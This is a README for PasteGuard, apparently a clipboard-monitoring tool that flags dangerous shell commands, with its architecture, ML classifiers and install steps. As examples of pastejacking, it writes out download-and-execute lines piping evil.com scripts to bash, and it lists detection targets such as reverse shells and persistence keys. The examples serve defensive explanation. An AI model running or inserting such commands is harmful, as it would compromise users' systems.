PasteGuard is a real‑time security tool that watches your clipboard.
The moment you copy a shell command from a website, tutorial, or email, PasteGuard scans it for hidden dangers invisible Unicode, obfuscated downloads, reverse shells, persistence tricks and warns you before you paste it into your terminal.
It runs entirely on your laptop, with no hardware, no internet required for detection, and zero‑trust architecture.
Copy‑pasting commands from the internet is the most dangerous daily habit of every developer, sysadmin, and power user. A single zero‑width space, a hidden newline, or an encoded PowerShell cradle can compromise your machine.
Traditional antivirus doesn't look at your clipboard. PasteGuard does.
Attackers constantly invent new ways to hide malicious code: alternating character casing, randomized variable names, domain‑generation‑algorithm (DGA) URLs, and encoding tricks that no signature can keep up with.
PasteGuard doesn't rely only on fixed rules anymore . It includes two offline machine‑learning models that run entirely on your device.
A lightweight model trained on thousands of safe vs. malicious commands. It catches the most common obfuscation patterns—even when the command looks innocent at first glance.
This is the real power‑up. Based on the same architecture described in the Microsoft / Ben‑Gurion University research paper "Detecting Malicious PowerShell Commands using Deep Neural Networks", our CNN looks at the command as a grid of characters, not as words. It automatically discovers patterns like:
- Alternating digits and letters (common in DGA‑generated domains)
- Case‑toggling obfuscation (
cM"d) - Encoded payloads that traditional NLP models miss
When the rule‑based engine is uncertain, both AI models vote. If either one thinks the command is suspicious, PasteGuard escalates the alert. No internet, no cloud, no privacy leak. The model files are tiny (~5 MB for the CNN, a few KB for logistic regression) and run silently in the background.
Research backing: The CNN architecture was proven in a 2018 study by Hendler, Kels, and Rubin to detect obfuscated PowerShell commands that evaded traditional NLP classifiers. We've adapted it for the clipboard.
- Websites can secretly inject malicious commands into your clipboard (pastejacking).
- Tutorials often contain obfuscated code:
curl http://evil.com/script | bashdisguised asapt update. - Hidden Unicode characters, homoglyphs, and line‑break injections are invisible to the human eye.
- Nobody inspects what they copy; they trust the website, then press Enter.
-
In 2016, security researcher Dylan Ayrey demonstrated that a website can replace what you copy with arbitrary text. You highlight sudo apt update, press Ctrl+C, and the clipboard suddenly contains sudo apt update && curl
http://evil.com/backdoor.sh | bash. No visible clue. His tool, Pastejack was meant as a proof‑of‑concept. But the attack vector has been adopted by real criminals. -
2022 PyPI "colourama" package — Attackers uploaded a typosquatting package that, when installed modified the victim's clipboard to inject a reverse shell command. Developers who copied commands from the package documentation pasted the payload directly into terminals, giving attackers persistent access to corporate CI/CD pipelines. The package was downloaded 2,000+ times before detection.
-
2024 "Volt Typhoon" APT Infrastructure — CISA reported that Chinese state-sponsored actors used SEO-poisoned "Windows troubleshooting" blogs. Victims copied
certutil -urlcache -split -f http://...commands to "fix" their systems. The commands downloaded remote access tools. The blogs remained online for 8 months, targeting critical infrastructure operators. -
In 2024 a red‑team exercise at a Fortune 500 company found that 87% of targeted employees pasted a manipulated command from an internal phishing email into their corporate terminals. The red team gained domain admin within 15 minutes.
- SANS 2023 Threat Landscape Report: 37% of successful intrusions began with command-line manipulation, including clipboard injection and obfuscated PowerShell.
- Microsoft Digital Defense Report 2024: PowerShell-based attacks grew 58% year-over-year. Obfuscated clipboard content was the primary delivery method for file-less malware in enterprise environments.
- Verizon DBIR 2024: Social engineering and malicious scripting accounted for 42% of all breaches. "Copy-paste from untrusted source" was the #1 vector in developer-targeted phishing.
- Google TAG 2023: Over 800,000 phishing emails containing malicious copy-paste instructions were blocked. The actual delivery rate to inboxes is estimated at 15-20%.
PasteGuard monitors your clipboard in real time (both Ctrl+C and right‑click copy).
When you copy a command, it:
- Reveals hidden characters – zero‑width spaces, bidi overrides, look‑alike operators.
- Detects malicious patterns –
curl | bash,bitsadmin,reg add … Run, reverse shells, encoded payloads. - Checks URLs against VirusTotal, URLhaus, and WHOIS (optional, requires API keys).
- Uses AI classifiers – a logistic regression model and an optional character‑level CNN (as in Microsoft's research) to catch never‑before‑seen obfuscation.
- Shows a system notification – alerts you immediately, no pop‑ups to dismiss.
- Logs alerts to Slack (optional) and to a local JSON file.
Everything runs locally. The AI models don't need the internet.
PasteGuard is built as a modular, single‑process Python application.
It runs entirely offline; only optional external API calls (VirusTotal, URLhaus, WHOIS, Slack) leave the machine.
| Component | Responsibility |
|---|---|
| Clipboard Watcher | Polls the system clipboard every 0.5 s and hooks the Ctrl+C keyboard event. Detects new content via SHA‑256 hash comparison. |
| Command Analyzer | Decides whether the copied text looks like a shell command, then runs a chain of sub‑analyzers. |
| Hidden Character Inspector | Scans for zero‑width characters, bidirectional overrides, and homoglyph operators. Any finding immediately raises the danger level. |
| Pattern Matching Engine | A curated list of ~20 regex patterns covering pipes to shell, download‑and‑execute, reverse shells, Windows persistence, destructive commands, and obfuscation techniques. |
| Domain Reputation Checker | Extracts URLs from the command and queries VirusTotal, URLhaus, and WHOIS (if API keys are configured). Only executes for commands that contain http:// or https://. |
| AI Ensemble | Two offline machine‑learning models that run locally with no internet dependency. |
| Sandbox (optional) | If Docker is present, executes the sanitized command in an isolated Alpine container with strace. Reports file writes, network attempts, and sub‑shell spawns. |
| Notification & Logging | Sends system notifications via plyer. Writes structured JSON alerts to a local log file and optionally posts a summary to a Slack webhook. |
| Model | Type | Size | When it runs |
|---|---|---|---|
| Logistic Regression | TF‑IDF character 3‑grams + Logistic Regression | ~50 KB | Always loaded. Votes when rule‑based score is between 1 and 44. |
| Character‑level CNN | 4‑layer ConvNet (62×1024 input grid, 128 kernels) | ~5 MB | Loaded if command_classifier_cnn.h5 exists and TensorFlow is installed. Votes on the same mild‑score band as the logistic model. |
Both models were trained on a mix of legitimate administrative commands and real‑world malicious samples. When either model votes "malicious", the overall danger score is raised by 40 points and the level is escalated.
- You copy a command from anywhere.
- PasteGuard reads the clipboard.
- If it looks like a shell command, the analysis begins.
- Hidden characters are flagged immediately.
- Known malicious patterns (download‑execute, reverse shells, persistence) raise the score.
- URLs are checked against threat intelligence. (Virustotal)
- If the score is mild, the AI models vote. Either can escalate to dangerous.
- A notification is shown; the user is never interrupted by a GUI window.
-
Install Python 3.10 or 3.11 (not 3.12+ yet, for TensorFlow support).
Download from python.org, check "Add Python to PATH". -
Open Command Prompt and run:
git clone https://github.com/Himanshu0ix/pasteguard.git cd pasteguard pip install -r requirements.txt -
(Optional) For the CNN AI, also install Tensorflow:
pip install tensorflow
-
Start PasteGuard:
python pasteguard.py
-
Stop with Ctrl + Alt + Shift + Q
-
Install Python 3.10 and Tkinter:
sudo apt update sudo apt install python3.10 python3.10-venv python3-tk
-
Clone and enter the folder:
git clone https://github.com/Himanshu0ix/pasteguard.git cd pasteguard python3.10 -m venv venv source venv/bin/activate
-
Install dependencies:
pip install -r requirements.txt
-
(Optional) For the CNN AI, install Tensorflow:
pip install tensorflow
-
Run:
python pasteguard.py
-
Stop with Ctrl+Alt+Shift+Q or Ctrl+C
PasteGuard comes with a pre‑trained logistic regression model (command_classifier.pkl).
To build the advanced CNN model:
-
Ensure TensorFlow is installed (
pip install tensorflow). -
Run the training script:
python train_cnn.py
This creates
command_classifier_cnn.h5. -
Place the file next to
pasteguard.pyand restart the tool. The CNN will now assist the rule engine.
- VirusTotal / Slack: Edit
pasteguard.pyand setVIRUSTOTAL_API_KEYandSLACK_WEBHOOK_URL. - Sandbox: Install Docker; dangerous commands will be analyzed in an isolated container automatically.
- Notifications: Works out‑of‑the‑box on Windows, and most Linux desktops.
Pull requests, bug reports, and feature ideas are welcome.
See CONTRIBUTING.md for guidelines.
MIT License
Copyright (c) 2025 [Himanshu0ix]
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.